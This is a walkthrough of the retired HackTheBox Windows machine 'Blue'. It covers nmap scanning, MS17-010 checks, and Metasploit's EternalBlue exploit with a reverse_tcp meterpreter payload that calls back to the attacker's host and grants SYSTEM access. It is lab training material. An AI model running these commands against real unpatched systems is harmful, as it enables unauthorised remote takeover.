Blue HackTheBox WalkThrough
This is Blue HackTheBox machine walkthrough and is the
11th machine of our
OSCP like HTB boxes series. In this writeup, I have demonstrated step-by-step how I rooted to
Blue HTB machine. Before starting let us know something about this machine. It is a
windows box with IP address
10.10.10.40 and difficulty
low assigned by its maker.
This machine is currently
retired so you will require
VIP subscription at
hackthebox.eu to access this machine. First of all, connect your PC with
HackTheBox VPN and make sure your connectivity with Blue machine by pinging its IP 10.10.10.40. If all goes correct then start hacking. As usual I started by scanning the machine. Used
Nmap [a port scanner] for this task and the result is below-
$ nmap -sC -sV -oN blue.nmap 10.10.10.40
Nmap revealed that many number of ports are open.
Microsoft RPC on port
netbios-ssn on port
SMB on port
445 are running. Among all open ports only ports
445 are useful for us because we can enumerate a lot on these ports. We have tools like
enum4linux, rpcclient and even more to enumerate on these 3 ports.
Before going further for enumeration on port 445 for SMB shares we should not forget to test for
NSA's EternalBlue Exploit which was
leaked by Shadow Broker hacker group in 2017. For more information about this exploit you should read this Wikipedia article.
So whenever you see
smb service is running on port 445 or 135 then first exploit that should strike to your mind is
Doublepulsar whose detail was issued in
Microsoft bulletin ms17-010. To check whether this machine is vulnerable to eternalblue exploit there is an nmap script
smb-vuln-ms17-010.nse and also a metasploit auxiliary module
auxiliary/scanner/smb/smb_ms17_010 which scan the machine for
ms17-10 patch. You can use any one method to check. I have used both the methods just to show you the vulnerability.
Checking For ms17-010 Exploit
$ nmap -p 445 10.10.10.40 --script=smb-vuln-ms17-010.nse
smb-vuln-ms17-010.nse revealed that
Blue machine is vulnerable to
ms17-010 exploit. Let us check it with
metasploit’s auxiliary module
auxiliary/scanner/smb/smb_ms17_010 for this vulnerability.
msf5 > search eternalblue
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
Metasploit module also revealed that it is vulnerable to
ms17-010 exploit. Let us know something about ms17-10 exploit. Basically ms17-010 is an
exploit suit which consists of
5 exploits. Among them
first two is scanner and last three are exploiter. Since we have confirmed that it is vulnerable to ms17-010 exploit so any one of the exploit from last three of them can help in getting shell. I tried
first one and could easily got user shell.
Getting User Shell
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.10.14.6
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
So we have got shell very easily and that too with
admin privilege. Now we don’t require to
escalate privilege because we are already an
NT AUTHORITY\SYSTEM which is the highest level of privilege a windows user has. I think since this machine was vulnerable to eternalblue exploit that’s why it is named as blue by its maker which is suffix of eternalblue. Let’s capture user and root flag.
Capture User Flag
meterpreter > cat "C:\Users\haris\Desktop\user.txt"
Capture Root Flag
meterpreter > cat "C:\Users\Administrator\Desktop\root.txt"
This was how I rooted Blue HackTheBox machine. This was very easy box. Hope you guys have learnt some new things from this walkthrough. Thanks for reading this writeup. For any suggestion and query related to walkthrough feel free to write us at [email protected].
Next retired machine walkthrough is Nineveh.